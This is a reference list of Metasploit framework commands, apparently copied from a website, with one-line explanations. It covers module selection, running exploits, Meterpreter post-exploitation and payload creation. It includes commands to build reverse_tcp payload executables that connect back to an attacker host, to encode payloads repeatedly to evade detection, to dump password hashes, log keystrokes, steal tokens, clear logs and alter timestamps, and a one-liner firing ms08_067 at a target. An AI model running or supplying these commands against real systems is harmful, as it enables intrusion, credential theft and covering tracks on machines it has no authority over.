Complete list of Metasploit (MSF) terminal commands

Source: Internet
Author: User

show exploits

Lists all exploit modules in the Metasploit framework.
show payloads

Lists all attack payloads in the Metasploit framework.
show auxiliary

Lists all auxiliary modules in the Metasploit framework.
search name

Searches for exploits and other modules in the Metasploit framework.
info

Displays information about a specific exploit or module.
use name

Loads an exploit or module.
LHOST

The local host IP address that the target host connects back to. When the target host is not on the same LAN, this usually needs to be a public IP address. Used mainly for reverse shells.
RHOST

Remote host or target host.
set function

Sets a specific configuration parameter (e.g. the local or remote host).
setg function

Sets a specific configuration parameter globally (e.g. the local or remote host).
show options

Lists all the configuration parameters of an exploit or module.
show targets

Lists all target platforms supported by the exploit.
set target num

Specifies the operating system and patch level of the target, if you know it.
set payload name

Specifies the attack payload you want to use.
show advanced

Lists all advanced configuration options.
set autorunscript migrate -f

After exploitation completes, automatically migrates to another process.
check

Checks whether the target is vulnerable to the selected exploit.
exploit

Runs the exploit or module against the target.
exploit -j

Runs the exploit as a job (the attack takes place in the background).
exploit -z

Does not interact with the session after exploitation completes.
exploit -e encoder

Specifies the payload encoder to use (e.g. exploit -e shikata_ga_nai).
exploit -h

Lists the help information for the exploit command.
sessions -l

Lists the available interactive sessions (used when working with multiple shells).
sessions -l -v

Lists all available interactive sessions with details, e.g. which security vulnerability was used to attack the system.
sessions -s script

Runs a specific Metasploit script in all active Metasploit sessions.
sessions -K

Kills all active interactive sessions.
sessions -c cmd

Executes a command on all active Metasploit sessions.
sessions -u sessionID

Upgrades a normal Win32 shell to a Meterpreter shell.
db_create name

Creates a database (e.g. db_create autopwn) to be used by database-driven attacks.
db_connect name

Creates and connects to a database (e.g. db_connect user:[email protected]/sqlname) to be used by database-driven attacks.
db_nmap

Runs Nmap and stores the scan results in the database (the usual Nmap options are supported, e.g. -sT -v -P0).
db_autopwn -h

Displays the help information for the db_autopwn command.
db_autopwn -p -r -e

Runs db_autopwn against all discovered open ports, attacks all systems, and uses a reverse shell.
db_destroy

Deletes the current database.
db_destroy user:[email protected]:port/database

Deletes the database using advanced options.
Meterpreter Commands * * *

help

Opens the Meterpreter usage help.
run scriptname

Runs a Meterpreter script; all script names can be found in the scripts/meterpreter directory.
sysinfo

Lists system information for the compromised host.
ls

Lists the files and folders on the target host.
use priv

Loads the privilege escalation extension to extend the Metasploit library.
ps

Displays all running processes and their associated user accounts.
migrate PID

Migrates to the specified process ID (the PID can be obtained on the host with the ps command).
use incognito

Loads the incognito functions (used to steal tokens on the target host or impersonate users).
list_tokens -u

Lists the tokens available on the target host by user.
list_tokens -g

Lists the tokens available on the target host by user group.
impersonate_token domain_name\username

Impersonates a token that is available on the target host.
steal_token PID

Steals the tokens available to the given process and impersonates with them.
drop_token

Stops impersonating the current token.
getsystem

Attempts to elevate to system user privileges through various attack vectors.
execute -f cmd.exe -i

Executes cmd.exe and interacts with it.
execute -f cmd.exe -i -H -t

Executes cmd.exe with all available tokens and hides the process.
rev2self

Reverts to the initial user account that was used to control the target host.
reg command

Interacts with, creates, deletes and queries entries in the target host's registry.
setdesktop number

Switches to another user's desktop (depends on which users are logged on).
screenshot

Takes a screenshot of the target host's screen.
upload file

Uploads a file to the target host.
download file

Downloads a file from the target host.
keyscan_start

Starts the keylogger on the remote target host.
keyscan_dump

Dumps the keystrokes captured on the target host.
keyscan_stop

Stops the keylogger on the target host.
getprivs

Obtains as many privileges as possible on the target host.
uictl enable keyboard/mouse

Takes over the target host's keyboard and mouse.
background

Sends the current Meterpreter shell to the background.
hashdump

Dumps the password hashes on the target host.
use sniffer

Loads the sniffer module.
sniffer_interfaces

Lists all available network interfaces on the target host.
sniffer_dump interfaceID pcapname

Start sniffing on the target host.
sniffer_start interfaceID packet-buffer

Starts sniffing on the target host with a specific packet buffer range.
sniffer_stats interfaceID

Gets statistics for the network interface being sniffed.
sniffer_stop interfaceID

Stops sniffing.
add_user username password -h ip

Adds a user on the remote target host.
clearev

Clears the log records on the target host.
timestomp

Modifies file attributes, such as a file's creation time (an anti-forensics measure).
reboot

Restarts the target host.
msfpayload Commands * * *

msfpayload -h

Lists the help information for msfpayload.
msfpayload windows/meterpreter/bind_tcp O

Lists the configuration options available for the windows/meterpreter/bind_tcp payload (the options of any payload can be listed this way).
msfpayload windows/meterpreter/reverse_tcp LHOST=ip LPORT=port X > payload.exe

Creates a Metasploit reverse_tcp payload that connects back to LHOST on LPORT, and saves it as a Windows executable named payload.exe.
msfpayload windows/meterpreter/reverse_tcp LHOST=ip LPORT=port R > payload.raw

Creates a Metasploit reverse_tcp payload that connects back to LHOST on LPORT, and saves it in raw format as payload.raw, for later use with msfencode.
msfpayload windows/meterpreter/reverse_tcp LPORT=port C > payload.c

Creates a Metasploit reverse_tcp payload and exports it as C-format shellcode.
msfpayload windows/meterpreter/reverse_tcp LPORT=port J > payload.java

Creates a Metasploit reverse_tcp payload and exports it as a JavaScript string in %u encoding.
msfencode Commands * * *

msfencode -h

Lists the help information for msfencode.
msfencode -l

Lists all the available encoders.
msfencode -t (c, elf, exe, java, js_le, js_be, perl, raw, ruby, vba, vbs, loop_vbs, asp, war, macho)

The format in which to display the encoded buffer.
msfencode -i payload.raw -o encoded_payload.exe -e x86/shikata_ga_nai -c 5 -t exe

Encodes the payload.raw file 5 times with the shikata_ga_nai encoder, then outputs a file named encoded_payload.exe.
msfpayload windows/meterpreter/bind_tcp LPORT=port R | msfencode -e x86/countdown -c 5 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o multi-encoded_payload.exe

Creates a payload that is encoded in multiple nested passes with different encoders.
msfencode -i payload.raw BufferRegister=ESI -e x86/alpha_mixed -t c

Creates a purely alphanumeric shellcode, with the ESI register pointing to the shellcode, output in C format.
msfcli Commands * * *

msfcli | grep exploit

Lists only the exploit modules.
msfcli | grep exploit/windows

Lists only the exploit modules associated with Windows.
msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/bind_tcp LPORT=port RHOST=ip E

Launches the ms08_067_netapi exploit against the given IP, configured with the bind_tcp payload, which binds to the given port and listens on it.
